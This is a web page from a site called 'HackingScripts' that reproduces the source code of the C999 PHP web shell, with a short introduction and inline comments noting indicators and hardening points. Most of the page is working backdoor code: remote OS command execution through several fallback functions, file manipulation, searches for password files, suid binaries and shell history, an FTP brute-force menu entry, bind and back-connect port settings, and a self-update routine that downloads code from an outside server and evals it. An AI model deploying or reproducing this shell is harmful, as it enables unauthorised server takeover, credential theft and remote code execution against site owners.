HackingScripts

Hack Scripts for everybody

C999 shell

24 Jan 2014

This was the very first hack script uploaded to my website, so it holds a special place in my heart.

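It’s a version of the c99 shell script, a PHP web shell that hackers (read: script kiddies) plant on insecure websites to gain backdoor entry. Finding a file like this on a server therefore means the site has already been compromised.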

It appears to be incomplete (I added the final ‘?>’), perhaps because the end of the script was cut off during the upload process. Note that this script is only just over 1100 lines long, while the complete C99 shell is about 2000 lines longer!

I have received many more C99 scripts since this one, most of them complete and more up-to-date than this one.

C999 Shell Script Source Code

   1 <?php //Starting calls if (!function_exists("getmicrotime")) {function getmicrotime() { list($usec, $sec) = explode(" ", microtime());  return ((float)$usec + (float)$sec);}} error_reporting(5); @ignore_user_abort(TRUE); @set_magic_quotes_runtime(0); $win = strtolower(substr(PHP_OS,0,3)) == "win"; define("starttime",getmicrotime()); if (get_magic_quotes_gpc()) {if (!function_exists("strips")) { function strips(&$arr,$k="") {if (is_array($arr))  {foreach($arr as $k=-->$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}}
   2 else {$arr = stripslashes($arr);}}} strips($GLOBALS);}
   3 $_REQUEST = array_merge($_COOKIE,$_GET,$_POST); // rebuild $_REQUEST from cookie, GET and POST data; for duplicate keys POST overrides GET, and GET overrides the cookie
   4 foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}} // register_globals-style import: every request key becomes a same-named variable unless one is already set, so any variable the script reads before assigning it (for example $act further down) holds client-supplied data
   5 $shver = "1.0 pre-release build #16"; //Current version
   6 //CONFIGURATION AND SETTINGS
   7 if (!empty($unset_surl)) {setcookie("c999sh_surl"); $surl = "";}
   8 elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c999sh_surl",$surl);}
   9 else {$surl = $_REQUEST["c999sh_surl"]; //Set this cookie for manual SURL
  10 }
  11 $surl_autofill_include = TRUE; //If TRUE then search variables with
  12                                //descriptors (URLs) and save it in SURL.
  13 if ($surl_autofill_include and !$_REQUEST["c999sh_surl"]) {$include = "&"; foreach
  14 (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v);
  15 $name = urldecode($v[0]);
  16 $value = urldecode($v[1]);
  17 foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {
  18 if (strpos($value,$needle) === 0) {
  19 $includestr .= urlencode($name)."=".urlencode($value)."&";}}}
  20 if ($_REQUEST["surl_autofill_include"]) {
  21 $includestr .= "surl_autofill_include=1&";}}
  22 if (empty($surl))
  23 {
  24  $surl = "?".$includestr; //Self url
  25 }
  26 $surl = htmlspecialchars($surl);
  27 $timelimit = 0; //time limit of execution this script over server quote
  28                 //(seconds), 0 = unlimited.
  29 //Authentication. As shipped both controls are open: $login is empty and $host_allow matches every host.
  30 $login = ""; //login; the HTTP-auth check further down runs only when this is non-empty
  31 //DON'T FORGOT ABOUT PASSWORD!!!
  32 $pass = ""; //password (plain text); only used to derive $md5_pass when that one is empty
  33 $md5_pass = ""; //md5-crypted pass. if empty, md5($pass) is used
  34 $host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1"); the single "*" mask accepts any client
  35 $login_txt = "Restricted area"; //http-auth message, sent as part of the Basic-auth realm.
  36 $accessdeniedmess = "<a href="\&quot;http://ccteam.ru/releases/c999shell\&quot;">c999shell v.".$shver."</a>: access denied";
  37 $gzipencode = TRUE; //Encode with gzip?
  38 $updatenow = FALSE; //If TRUE, update now (this variable will be FALSE)
  39 $c999sh_updateurl = "http://ccteam.ru/update/c999shell/"; //Update server, contacted over plain HTTP by c999sh_getupdate(); outbound requests from a web server to this host are a network indicator
  40 $c999sh_sourcesurl = "http://ccteam.ru/files/c999sh_sources/"; //Sources-server, base URL that c999getsource() downloads helper programs from
  41 $filestealth = TRUE; //if TRUE, don't change modify- and access-time. NOTE(review): the code that reads this flag is outside this excerpt; if it restores timestamps after edits, file mtimes/atimes on an affected host are unreliable for timeline work - confirm
  42 $donated_html = "</pre>
  43 <center><b>Owned by hacker</b></center>
  44 <pre>";
  45 /* If you publish free shell and you wish
  46 add link to your site or any other information,
  47 put here your html. */
  48 $donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html.
  49 $curdir = "./"; //start folder
  50 //$curdir = getenv("DOCUMENT_ROOT");
  51 $tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp)
  52 $tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...)
  53 $log_email = "user@host.tld"; //Default e-mail for sending logs
  54 $sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending
  55 $sort_save = TRUE; //If TRUE then save sorting-position using cookies.
  56 // Registered file-types.
  57 //  array(
  58 //   "{action1}"=>array("ext1","ext2","ext3",...),
  59 //   "{action2}"=>array("ext4","ext5","ext6",...),
  60 //   ...
  61 //  )
  62 $ftypes  = array(
  63  "html"=>array("html","htm","shtml"),
  64  "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
  65  "exe"=>array("sh","install","bat","cmd"),
  66  "ini"=>array("ini","inf"),
  67  "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
  68  "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
  69  "sdb"=>array("sdb"),
  70  "phpsess"=>array("sess"),
  71  "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
  72 );
  73 // Registered executable file-types.
  74 //  array(
  75 //   string "command{i}"=>array("ext1","ext2","ext3",...),
  76 //   ...
  77 //  )
  78 //   {command}: %f% = filename
  79 $exeftypes  = array(
  80  getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
  81  "perl %f%" => array("pl","cgi")
  82 );
  83 /* Highlighted files.
  84   array(
  85    i=>array({regexp},{type},{opentag},{closetag},{break})
  86    ...
  87   )
  88   string {regexp} - regular exp.
  89   int {type}:
  90 0 - files and folders (as default),
  91 1 - files only, 2 - folders only
  92   string {opentag} - open html-tag, e.g. "<b>" (default)
  93   string {closetag} - close html-tag, e.g. "</b>" (default)
  94   bool {break} - if TRUE and found match then break
  95 */
  96 $regxp_highlight  = array(
  97   array(basename($_SERVER["PHP_SELF"]),1,"</pre>
  98 <span>","</span>
  99 <pre>"), // example
 100   array("config.php",1) // example
 101 );
 102 $safemode_diskettes = array("a"); // This variable for disabling diskett-errors.
 103  // array (i=>{letter} ...); string {letter} - letter of a drive
 104 //$safemode_diskettes = range("a","z");
 105 $hexdump_lines = 8;// lines in hex preview file
 106 $hexdump_rows = 24;// 16, 24 or 32 bytes in one line
 107 $nixpwdperpage = 100; // Get first N lines from /etc/passwd
 108 $bindport_pass = "c999";  // default password for binding (presumably for the c999sh_bindport helpers listed in c999getsource(); the code using it is outside this excerpt)
 109 $bindport_port = "31373"; // default port for binding; an unexpected listener on this port on a web host is worth checking during triage
 110 $bc_port = "31373"; // default port for back-connect, i.e. an outbound connection from the web host
 111 $datapipe_localport = "8081"; // default local port for datapipe
 112 // Command-aliases
 113 if (!$win)
 114 {
 115  $cmdaliases = array(
 116   array("-----------------------------------------------------------", "ls -la"),
 117   array("find all suid files", "find / -type f -perm -04000 -ls"),
 118   array("find suid files in current dir", "find . -type f -perm -04000 -ls"),
 119   array("find all sgid files", "find / -type f -perm -02000 -ls"),
 120   array("find sgid files in current dir", "find . -type f -perm -02000 -ls"),
 121   array("find config.inc.php files", "find / -type f -name config.inc.php"),
 122   array("find config* files", "find / -type f -name \"config*\""),
 123   array("find config* files in current dir", "find . -type f -name \"config*\""),
 124   array("find all writable folders and files", "find / -perm -2 -ls"),
 125   array("find all writable folders and files in current dir", "find . -perm -2 -ls"),
 126   array("find all service.pwd files", "find / -type f -name service.pwd"),
 127   array("find service.pwd files in current dir", "find . -type f -name service.pwd"),
 128   array("find all .htpasswd files", "find / -type f -name .htpasswd"),
 129   array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
 130   array("find all .bash_history files", "find / -type f -name .bash_history"),
 131   array("find .bash_history files in current dir", "find . -type f -name .bash_history"),
 132   array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
 133   array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
 134   array("list file attributes on a Linux second extended file system", "lsattr -va"),
 135   array("show opened ports", "netstat -an | grep -i listen")
 136  );
 137 }
 138 else
 139 {
 140  $cmdaliases = array(
 141   array("-----------------------------------------------------------", "dir"),
 142   array("show opened ports", "netstat -an")
 143  );
 144 }
 145 $sess_cookie = "c999shvars"; // Cookie-variable name
 146 $usefsbuff = TRUE; //Buffer-function
 147 $copy_unset = FALSE; //Remove copied files from buffer after pasting
 148 //Quick launch
 149 $quicklaunch = array(
 150  array("<img alt="\&quot;Home\&quot;" src="\&quot;&quot;.$surl.&quot;act=img&img=home\&quot;" width="\&quot;20\&quot;" height="\&quot;20\&quot;" border="\&quot;0\&quot;" />",$surl),
 151  array("<img alt="\&quot;Back\&quot;" src="\&quot;&quot;.$surl.&quot;act=img&img=back\&quot;" width="\&quot;20\&quot;" height="\&quot;20\&quot;" border="\&quot;0\&quot;" />","#\" onclick=\"history.back(1)"),
 152  array("<img alt="\&quot;Forward\&quot;" src="\&quot;&quot;.$surl.&quot;act=img&img=forward\&quot;" width="\&quot;20\&quot;" height="\&quot;20\&quot;" border="\&quot;0\&quot;" />","#\" onclick=\"history.go(1)"),
 153  array("<img alt="\&quot;UPDIR\&quot;" src="\&quot;&quot;.$surl.&quot;act=img&img=up\&quot;" width="\&quot;20\&quot;" height="\&quot;20\&quot;" border="\&quot;0\&quot;" />",$surl."act=ls&d=%upd&sort=%sort"),
 154  array("<img alt="\&quot;Refresh\&quot;" src="\&quot;&quot;.$surl.&quot;act=img&img=refresh\&quot;" width="\&quot;17\&quot;" height="\&quot;20\&quot;" border="\&quot;0\&quot;" />",""),
 155  array("<img alt="\&quot;Search\&quot;" src="\&quot;&quot;.$surl.&quot;act=img&img=search\&quot;" width="\&quot;20\&quot;" height="\&quot;20\&quot;" border="\&quot;0\&quot;" />",$surl."act=search&d=%d"),
 156  array("<img alt="\&quot;Buffer\&quot;" src="\&quot;&quot;.$surl.&quot;act=img&img=buffer\&quot;" width="\&quot;20\&quot;" height="\&quot;20\&quot;" border="\&quot;0\&quot;" />",$surl."act=fsbuff&d=%d"),
 157  array("<b>Encoder</b>",$surl."act=encoder&d=%d"),
 158  array("<b>Tools</b>",$surl."act=tools&d=%d"),
 159  array("<b>Proc.</b>",$surl."act=processes&d=%d"),
 160  array("<b>FTP brute</b>",$surl."act=ftpquickbrute&d=%d"),
 161  array("<b>Sec.</b>",$surl."act=security&d=%d"),
 162  array("<b>SQL</b>",$surl."act=sql&d=%d"),
 163  array("<b>PHP-code</b>",$surl."act=eval&d=%d"),
 164  array("<b>Update</b>",$surl."act=update&d=%d"),
 165  array("<b>Feedback</b>",$surl."act=feedback&d=%d"),
 166  array("<b>Self remove</b>",$surl."act=selfremove"),
 167  array("<b>Logout</b>","#\" onclick=\"if (confirm('Are you sure?')) window.close()")
 168 );
 169 //Highlight-code colors
 170 $highlight_background = "#c0c0c0";
 171 $highlight_bg = "#FFFFFF";
 172 $highlight_comment = "#6A6A6A";
 173 $highlight_default = "#0000BB";
 174 $highlight_html = "#1300FF";
 175 $highlight_keyword = "#007700";
 176 $highlight_string = "#000000";
 177 @$f = $_REQUEST["f"]; // file name taken straight from the request; @ hides the notice when it is absent
 178 @extract($_REQUEST["c999shcook"]); // imports the keys of a request-supplied array as variables. extract() overwrites existing variables by default and this runs after the configuration above, so those settings (access controls included) are not authoritative: treat a planted copy as reachable by third parties, not only by whoever uploaded it
 179 //END CONFIGURATION
 180 // \/Next code isn't for editing\/
 181 @set_time_limit(0); // removes PHP's execution time limit for this request
 182 $tmp = array();
 183 foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));} // each mask is regex-quoted, then its "*" wildcard is turned into ".*"
 184 $s = "!^(".implode("|",$tmp).")$!i"; // anchored, case-insensitive alternation of all masks
 185 if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href="\&quot;http://ccteam.ru/releases/cc999shell\&quot;">c999shell</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");} // request is refused only when neither the client address nor its reverse-DNS name matches a mask; with the default "*" mask every client passes
 186 if (!empty($login)) // HTTP Basic authentication, enforced only when a login name is configured
 187 {
 188  if (empty($md5_pass)) {$md5_pass = md5($pass);} // derive the stored hash from the plain-text password when no hash was configured
 189  if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) // password is checked as an unsalted MD5 hash, compared with loose !=
 190  {
 191   if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace(" |
 192 "," ",$donated_html));} // ereg_replace() was removed in PHP 7.0, one of several signs that this sample targets PHP 4/5
 193   header("WWW-Authenticate: Basic realm=\"c999shell ".$shver.": ".$login_txt."\""); // the realm text starts with "c999shell" plus the version string, which makes the 401 response recognisable in proxy or IDS data
 194   header("HTTP/1.0 401 Unauthorized");
 195   exit($accessdeniedmess);
 196  }
 197 }
 198 if ($act != "img")
 199 {
 200 $lastdir = realpath("."); // remember the directory the script started in
 201 chdir($curdir); // switch to the configured start folder
 202 if ($selfwrite or $updatenow) {@ob_clean(); c999sh_getupdate($selfwrite,1); exit;} // run the self-update routine and stop when either flag is set
 203 $sess_data = unserialize($_COOKIE["$sess_cookie"]); // state is read from the cookie named by $sess_cookie ("c999shvars" in the configuration above). unserialize() on client-supplied data is unsafe in general (object injection); a request cookie of that name holding serialize() output is an indicator wherever cookies are logged or inspected
 204 if (!is_array($sess_data)) {$sess_data = array();} // anything that did not decode to an array is discarded
 205 if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();} // "copy" buffer defaults to an empty list
 206 if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();} // "cut" buffer defaults to an empty list
 207 $disablefunc = @ini_get("disable_functions");
 208 if (!empty($disablefunc))
 209 {
 210  $disablefunc = str_replace(" ","",$disablefunc);
 211  $disablefunc = explode(",",$disablefunc);
 212 }
 213 if (!function_exists("c999_buff_prepare"))
 214 {
 215 function c999_buff_prepare()
 216 {
 217  global $sess_data;
 218  global $act;
 219  foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
 220  foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
 221  $sess_data["copy"] = array_unique($sess_data["copy"]);
 222  $sess_data["cut"] = array_unique($sess_data["cut"]);
 223  sort($sess_data["copy"]);
 224  sort($sess_data["cut"]);
 225  if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}
 226  else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}
 227 }
 228 }
 229 c999_buff_prepare();
 230 if (!function_exists("c999_sess_put"))
 231 {
 232 function c999_sess_put($data)
 233 {
 234  global $sess_cookie;
 235  global $sess_data;
 236  c999_buff_prepare();
 237  $sess_data = $data;
 238  $data = serialize($data);
 239  setcookie($sess_cookie,$data);
 240 }
 241 }
 242 foreach (array("sort","sql_sort") as $v)
 243 {
 244  if (!empty($_GET[$v])) {$$v = $_GET[$v];}
 245  if (!empty($_POST[$v])) {$$v = $_POST[$v];}
 246 }
 247 if ($sort_save)
 248 {
 249  if (!empty($sort)) {setcookie("sort",$sort);}
 250  if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
 251 }
 252 if (!function_exists("str2mini"))
 253 {
 254 function str2mini($content,$len)
 255 {
 256  if (strlen($content) > $len)
 257  {
 258   $len = ceil($len/2) - 2;
 259   return substr($content, 0,$len)."...".substr($content,-$len);
 260  }
 261  else {return $content;}
 262 }
 263 }
 264 if (!function_exists("view_size"))
 265 {
 266 function view_size($size)
 267 {
 268  if (!is_numeric($size)) {return FALSE;}
 269  else
 270  {
 271   if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
 272   elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
 273   elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
 274   else {$size = $size . " B";}
 275   return $size;
 276  }
 277 }
 278 }
 279 if (!function_exists("fs_copy_dir"))
 280 {
 281 function fs_copy_dir($d,$t)
 282 {
 283  $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
 284  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
 285  $h = opendir($d);
 286  while (($o = readdir($h)) !== FALSE)
 287  {
 288   if (($o != ".") and ($o != ".."))
 289   {
 290    if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
 291    else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
 292    if (!$ret) {return $ret;}
 293   }
 294  }
 295  closedir($h);
 296  return TRUE;
 297 }
 298 }
 299 if (!function_exists("fs_copy_obj"))
 300 {
 301 function fs_copy_obj($d,$t)
 302 {
 303  $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
 304  $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
 305  if (!is_dir(dirname($t))) {mkdir(dirname($t));}
 306  if (is_dir($d))
 307  {
 308   if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
 309   if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
 310   return fs_copy_dir($d,$t);
 311  }
 312  elseif (is_file($d)) {return copy($d,$t);}
 313  else {return FALSE;}
 314 }
 315 }
 316 if (!function_exists("fs_move_dir"))
 317 {
 318 function fs_move_dir($d,$t)
 319 {
 320  $h = opendir($d);
 321  if (!is_dir($t)) {mkdir($t);}
 322  while (($o = readdir($h)) !== FALSE)
 323  {
 324   if (($o != ".") and ($o != ".."))
 325   {
 326    $ret = TRUE;
 327    if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
 328    else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}}
 329    if (!$ret) {return $ret;}
 330   }
 331  }
 332  closedir($h);
 333  return TRUE;
 334 }
 335 }
 336 if (!function_exists("fs_move_obj"))
 337 {
 338 function fs_move_obj($d,$t)
 339 {
 340  $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
 341  $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
 342  if (is_dir($d))
 343  {
 344   if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
 345   if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
 346   return fs_move_dir($d,$t);
 347  }
 348  elseif (is_file($d))
 349  {
 350   if(copy($d,$t)) {return unlink($d);}
 351   else {unlink($t); return FALSE;}
 352  }
 353  else {return FALSE;}
 354 }
 355 }
 356 if (!function_exists("fs_rmdir"))
 357 {
 358 function fs_rmdir($d)
 359 {
 360  $h = opendir($d);
 361  while (($o = readdir($h)) !== FALSE)
 362  {
 363   if (($o != ".") and ($o != ".."))
 364   {
 365    if (!is_dir($d.$o)) {unlink($d.$o);}
 366    else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
 367   }
 368  }
 369  closedir($h);
 370  rmdir($d);
 371  return !is_dir($d);
 372 }
 373 }
 374 if (!function_exists("fs_rmobj"))
 375 {
 376 function fs_rmobj($o)
 377 {
 378  $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
 379  if (is_dir($o))
 380  {
 381   if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
 382   return fs_rmdir($o);
 383  }
 384  elseif (is_file($o)) {return unlink($o);}
 385  else {return FALSE;}
 386 }
 387 }
 388 if (!function_exists("myshellexec")) // defined only if no function of this name exists yet
 389 {
 390 function myshellexec($cmd) // Runs the OS command string $cmd and returns its output as a string ("" when $cmd is empty), trying several PHP execution primitives in turn.
 391 {
 392  global $disablefunc; // disable_functions value read at start-up (exploded into an array when it is non-empty)
 393  $result = "";
 394  if (!empty($cmd))
 395  {
 396   if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);} // 1st choice: exec(), output lines joined with newlines
 397   elseif (($result = `$cmd`) !== FALSE) {} // 2nd: the backtick operator, which is PHP's shell_exec(); not checked against $disablefunc here
 398   elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} // 3rd: system() prints directly, so the current buffer is saved, the command output is captured from the buffer, and the saved content is echoed back
 399   elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} // 4th: passthru(), captured the same way
 400   elseif (is_resource($fp = popen($cmd,"r"))) // 5th: popen(), also not checked against $disablefunc
 401   {
 402    $result = "";
 403    while(!feof($fp)) {$result .= fread($fp,1024);}
 404    pclose($fp);
 405   }
 406  }
 407  return $result; // Hardening note: each branch is an independent fallback, so a disable_functions list has to cover exec, shell_exec, system, passthru and popen together to close this function. At process level, the indicator is the web server / PHP worker spawning a shell.
 408 }
 409 }
 410 if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}}
 411 if (!function_exists("view_perms"))
 412 {
 413 function view_perms($mode)
 414 {
 415  if (($mode & 0xC000) === 0xC000) {$type = "s";}
 416  elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
 417  elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
 418  elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
 419  elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
 420  elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
 421  elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
 422  else {$type = "?";}
 423  $owner["read"] = ($mode & 00400)?"r":"-";
 424  $owner["write"] = ($mode & 00200)?"w":"-";
 425  $owner["execute"] = ($mode & 00100)?"x":"-";
 426  $group["read"] = ($mode & 00040)?"r":"-";
 427  $group["write"] = ($mode & 00020)?"w":"-";
 428  $group["execute"] = ($mode & 00010)?"x":"-";
 429  $world["read"] = ($mode & 00004)?"r":"-";
 430  $world["write"] = ($mode & 00002)? "w":"-";
 431  $world["execute"] = ($mode & 00001)?"x":"-";
 432  if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
 433  if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
 434  if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
 435  return $type.join("",$owner).join("",$group).join("",$world);
 436 }
 437 }
 438 if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}}
 439 if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}}
 440 if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}}
 441 if (!function_exists("parse_perms"))
 442 {
 443 function parse_perms($mode)
 444 {
 445  if (($mode & 0xC000) === 0xC000) {$t = "s";}
 446  elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
 447  elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
 448  elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
 449  elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
 450  elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
 451  elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
 452  else {$t = "?";}
 453  $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
 454  $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
 455  $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
 456  return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
 457 }
 458 }
 459 if (!function_exists("parsesort"))
 460 {
 461 function parsesort($sort)
 462 {
 463  $one = intval($sort);
 464  $second = substr($sort,-1);
 465  if ($second != "d") {$second = "a";}
 466  return array($one,$second);
 467 }
 468 }
 469 if (!function_exists("view_perms_color"))
 470 {
 471 function view_perms_color($o)
 472 {
 473  if (!is_readable($o)) {return "</pre>
 474 <span style="color: red;">".view_perms(fileperms($o))."</span>
 475 <pre>";}
 476  elseif (!is_writable($o)) {return "</pre>
 477 <span style="color: white;">".view_perms(fileperms($o))."</span>
 478 <pre>";}
 479  else {return "</pre>
 480 <span style="color: green;">".view_perms(fileperms($o))."</span>
 481 <pre>";}
 482 }
 483 }
 484 if (!function_exists("c999getsource")) // defined only if no function of this name exists yet
 485 {
 486 function c999getsource($fn) // Returns the text of one helper program downloaded from the sources server, or FALSE when $fn is not one of the six names below.
 487 {
 488  global $c999sh_sourcesurl; // base URL set in the configuration block
 489  $array = array( // fixed map: requested helper name => file name on the sources server (bind-port, back-connect and datapipe helpers, each in a .pl and a .c variant going by the names)
 490   "c999sh_bindport.pl" => "c999sh_bindport_pl.txt",
 491   "c999sh_bindport.c" => "c999sh_bindport_c.txt",
 492   "c999sh_backconn.pl" => "c999sh_backconn_pl.txt",
 493   "c999sh_backconn.c" => "c999sh_backconn_c.txt",
 494   "c999sh_datapipe.pl" => "c999sh_datapipe_pl.txt",
 495   "c999sh_datapipe.c" => "c999sh_datapipe_c.txt",
 496  );
 497  $name = $array[$fn];
 498  if ($name) {return file_get_contents($c999sh_sourcesurl.$name);} // remote fetch through PHP's URL wrappers (needs allow_url_fopen); the helpers are not embedded in this file, so their retrieval shows up as outbound HTTP from the web host
 499  else {return FALSE;}
 500 }
 501 }
 502 if (!function_exists("c999sh_getupdate")) // defined only if no function of this name exists yet
 503 {
 504 function c999sh_getupdate($update = TRUE) // Self-update: queries the update server and, depending on the reply type, returns a status string, overwrites this script with downloaded code, or evaluates code sent by the server (returning 1).
 505 {
 506  $url = $GLOBALS["c999sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&"; // query string carries the base64-encoded version; a "?version=...&updatenow=" request to the update host is a usable proxy/egress indicator
 507  $data = @file_get_contents($url); // plain-HTTP fetch through PHP's URL wrappers; allow_url_fopen=Off and egress filtering on the web host both stop it
 508  if (!$data) {return "Can't connect to update-server!";}
 509  else
 510  {
 511   $data = ltrim($data);
 512   $string = substr($data,3,ord($data{2})); // reply framing: byte 0 = 0x99 marker, byte 1 = reply type, byte 2 = payload length (one byte), payload starts at offset 3. The $data{n} offset syntax was removed in PHP 8.0
 513   if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;} // type 1: server-reported error (the second return is unreachable)
 514   if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";} // type 2: nothing to update
 515   if ($data{0} == "\x99" and $data{1} == "\x03") // type 3: newer version available
 516   {
 517    $string = explode("\x01",$string); // payload fields are 0x01-separated: [0] download URL, [1] version text
 518    if ($update)
 519    {
 520     $confvars = array();
 521     $sourceurl = $string[0];
 522     $source = file_get_contents($sourceurl); // second remote fetch, from a URL chosen by the server
 523     if (!$source) {return "Can't fetch update!";}
 524     else
 525     {
 526      $fp = fopen(__FILE__,"w"); // the running script file is truncated and rewritten, so the hash of a planted copy can change over time and hash-only IoCs go stale
 527      if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download c999shell.php manually <a href="\&quot;&quot;.$sourceurl.&quot;\&quot;"><span style="text-decoration: underline;">here</span></a>.";}
 528      else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";} // downloaded content is written without any integrity check
 529     }
 530    }
 531    else {return "New version are available: ".$string[1];}
 532   }
 533   elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;} // type 4: the payload is executed as PHP. Whoever operates the update server, or can alter the plain-HTTP reply in transit, gets code execution on the host
 534   else {return "Error in protocol: segmentation failed! (".$data.") ";}
 535  }
 536 }
 537 }
 538 if (!function_exists("mysql_dump")) // defined only if no function of this name exists yet
 539 {
 540 function mysql_dump($set) // Dumps tables of a MySQL database as SQL text (DROP/CREATE/INSERT statements), writes it to a file, optionally echoes it, and returns the dump text. $set is an option array with the keys read below. Uses the mysql_* extension, which was removed in PHP 7.0.
 541 {
 542  global $shver;
 543  $sock = $set["sock"]; // MySQL link resource
 544  $db = $set["db"]; // database name
 545  $print = $set["print"]; // echo the dump when true
 546  $nl2br = $set["nl2br"]; // when echoing, pass the dump through nl2br()
 547  $file = $set["file"]; // output file name; generated below when empty
 548  $add_drop = $set["add_drop"]; // emit DROP TABLE statements
 549  $tabs = $set["tabs"]; // list of tables to consider
